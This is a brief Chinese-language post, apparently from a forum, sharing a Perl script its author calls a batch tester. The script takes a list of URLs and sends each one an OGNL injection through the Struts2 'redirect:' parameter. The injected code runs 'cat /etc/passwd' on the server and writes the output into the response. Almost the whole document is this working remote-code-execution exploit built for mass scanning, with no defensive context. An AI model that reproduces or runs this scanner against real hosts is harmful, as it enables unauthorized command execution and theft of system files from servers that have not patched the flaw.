手贱写了个批量测试的。。昨天要测几个东西。。
#!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; use threads; use Thread::Semaphore; use Socket; while(<>){ Webscan($_); } sub Webscan { local($scan_url)=shift; $tmp=$scan_url .'?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}'; my $request=HTTP::Request->new(GET=>$tmp); my $uat=LWP::UserAgent->new(); $uat->timeout(10); my $response=$uat->request($request); if($response->status_line=~/200/) { }else{ print "------------------ "; # print $response->content; print $tmp; print "------------------ "; } }